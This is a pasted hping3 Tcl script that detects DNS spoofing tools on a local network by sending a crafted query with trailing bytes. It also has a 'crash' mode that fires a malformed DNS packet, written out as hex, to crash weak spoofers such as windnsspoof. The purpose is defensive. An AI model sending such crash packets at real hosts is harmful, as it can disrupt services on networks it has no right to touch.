
dns_despoof.tcl

a guest Jan 21st, 2012 285 Never
  1. #
  2. # DNS Despoofer
  3. # Emanuele "crossbower" Acri - 2010
  4. #
  5. # Usage:
  6. # hping3 exec dns_despoof.tcl <server> <interface> (<action:search|crash>)
  7. #
  8.  
  9. #
  10. # Search spoofers
  11. #
  12. proc search_spoofers { server interface } {
  13.  
  14.     # prepare and send DNS probe
  15.     set probe {ip(daddr=192.168.0.1,ttl=64)+udp(dport=53,sport=44556)+data(str=\2f\69\01\00\00\01\00\00\00\00\00\00\06\67\6f\6f\67\6c\65\03\63\6f\6d\00\00\01\00\01\70\69\7a\7a\61)};
  16.  
  17.     set probe [hping setfield ip daddr $server $probe];
  18.  
  19.     # send probe
  20.     hping send $probe;
  21.  
  22.     # sniff loop
  23.     while { 1 } {
  24.  
  25.         # sniff a single packet
  26.             set p [lindex [hping recv $interface] 0];
  27.        
  28.         # is it the DNS response?
  29.         if { [hping getfield ip proto $p] != 17 || [hping getfield ip saddr $p] != $server || [hping getfield udp sport $p] != 53 || [hping getfield udp dport $p] != 44556 } { continue }
  30.        
  31.         # get data
  32.         set res_data [hping getfield data str $p];
  33.         set result [string match "*pizza*" $res_data];
  34.            
  35.         if { $result == 0 } {
  36.             puts "No spoofer detected...";
  37.         } else {
  38.             puts "SPOOFER DETECTED!";
  39.         }
  40.        
  41.         break;
  42.     }
  43. }
  44.  
  45. #
  46. # Crash spoofers
  47. #
  48. proc crash_spoofers { server interface } {
  49.  
  50.     # prepare and send DNS probe
  51.     set probe {ip(daddr=192.168.0.1,ttl=64)+udp(dport=53,sport=44556)+data(str=\2f\69\01\00\00\01\00\00\00\00\00\00\06\67\6f\6f\67\6c\65\03\63\6f\6d\01\00\01\00\01\70\69\7a\7a\61)};
  52.  
  53.     set probe [hping setfield ip daddr $server $probe];
  54.  
  55.     # send probe
  56.     hping send $probe;
  57.    
  58.     puts "Bullet fired... Try again to search for spoofers:\n1) No responses: the spoofer is probably crashed (windnsspoof).\n2) Responses: it's a well written spoofer (dnsspoof).";
  59. }
  60.  
  61. #
  62. # Usage
  63. #
  64. proc usage {} {
  65.     puts "DNS Despoofer - Emanuele \"Crossbower\" Acri - 2010\nUsage:\n  hping3 exec dns_despoof.tcl <server> <interface> (<action:search|crash>)";
  66.     exit 250;
  67. }
  68.  
  69. #
  70. # Main
  71. #
  72.  
  73. #get dns server
  74. set server [lindex $argv 0];
  75. set interface [lindex $argv 1];
  76. set action [lindex $argv 2];
  77.  
  78. # check args
  79. if { $server == "" || $interface == "" } { usage }
  80.  
  81. # simple trick to initialize libpcap
  82. set p [lindex [hping recv $interface 1] 0];
  83.  
  84. # check action
  85. if { $action == "" || $action == "search" } {
  86.     search_spoofers $server $interface;
  87. } elseif { $action == "crash" } {
  88.     crash_spoofers $server $interface;
  89. } else {
  90.     usage;
  91. }
  92.  
  93. exit 0;